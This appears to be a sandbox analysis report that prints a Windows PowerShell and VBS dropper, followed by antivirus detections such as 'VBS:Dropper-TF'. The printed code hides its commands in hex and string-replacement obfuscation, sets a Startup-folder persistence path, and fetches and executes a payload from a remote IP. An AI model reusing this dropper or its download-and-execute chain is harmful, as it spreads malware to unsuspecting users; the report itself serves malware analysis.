popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$HxB = "5b 73 79 73 74 65 6d 2e 69 6f 2e 64 69 72 65 63 74 6f 72 79 5d 3a 3a 43 72 65 61 74 65 44 69 72 65 63 74 6f 72 79 28 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 58 58 58 22 29 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 35 0a 53 65 74 2d 49 74 65 6d 50 72 6f 70 65 72 74 79 20 2d 50 61 74 68 20 22 48 4b 43 55 3a 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 45 78 70 6c 6f 72 65 72 5c 55 73 65 72 20 53 68 65 6c 6c 20 46 6f 6c 64 65 72 73 22 20 2d 4e 61 6d 65 20 22 53 74 61 72 74 75 70 22 20 2d 56 61 6c 75 65 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 58 58 58 22 3b 0a 53 65 74 2d 49 74 65 6d 50 72 6f 70 65 72 74 79 20 2d 50 61 74 68 20 22 48 4b 43 55 3a 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 45 78 70 6c 6f 72 65 72 5c 53 68 65 6c 6c 20 46 6f 6c 64 65 72 73 22 20 2d 4e 61 6d 65 20 22 53 74 61 72 74 75 70 22 20 2d 56 61
$HxBB = $HxB -split ' ' |ForEach-Object {[char][byte]"0x$_"}
$HxBBB = $HxBB -join ''
&('I'+'EX') $HxBBB
start-sleep -s 7
$Content = @'
AAAAAAAAAAA = replace("W~~~~~~~~~~~~~~cript.~~~~~~~~~~~~~~hEll","~~~~~~~~~~~~~~","s")
BBBBBBBBBBBBBB = replace("pOwFixFixFixFixFixFixFixFixFixrshFixFixFixFixFixFixFixFixFixll","FixFixFixFixFixFixFixFixFix","E")
Set HHHHHHHHHH = CreateObject(AAAAAAAAAAA)
CCCCCCCCCCCCCCCCC = replace(" $H ='http://179.61.237.75/A/MONEUE.txt';$H1 = 'AAAAAAAABBBBBBBBCCCCCCCC'.RFixplacFix('AAAAAAAA','n').RFixplacFix('BBBBBBBB','Fix').RFixplacFix('CCCCCCCC','t');$H2 ='DDDDDDDDFixFixFixFixFixFixFixFixFixFixFix'.RFixplacFix('DDDDDDDD','.').RFixplacFix('FixFixFixFixFixFixFixFixFixFix','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.RFixplacFix('NNNNNNNNNNNNNNNNTTTTTTTTTT','IFix');$H3 ='LLLLLLLLLL'.RFixplacFix('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.RFixplacFix('---------------','WnLoaDSTrI');$HHHH ='I`---------------Fixc++++++++++++++H).$HHH($H)'.RFixplacFix('`---------------','FixX(nFix`W`-Obj`').RFixplacFix('++++++++++++++','`T $H');&('I'+'FixX')($HHHH -Join '')|&('I'+'FixX');","Fix","e")
HHHHHHHHHH.Run(BBBBBBBBBBBBBB+CCCCCCCCCCCCCCCCC+""),0,True
Set HHHHHHHHHH = Nothing
Set-Content -Path C:\ProgramData\XXX\XXX.vbs -Value $Content
start-sleep -s 4
&('{1}{0}'-f'X','IE')(&('{1}{0}{2}' -f'je','New-Ob','ct') ('{1}{2}{0}' -f 'WebClient','Ne','t.')).('{2}{3}{1}{0}' -f'dString','nloa','D','ow').InVoKe('http://179.61.237.75/A/MONEUE.txt')
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall Clean
Avast VBS:Dropper-TF [Trj]
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Sophos Clean
Ikarus Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Trojan:Script/Wacatac.B!ml
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Clean
Cynet Clean
AhnLab-V3 Clean
VBA32 Clean
ALYac Clean
MAX Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG VBS:Dropper-TF [Trj]
Panda Clean
No IRMA results available.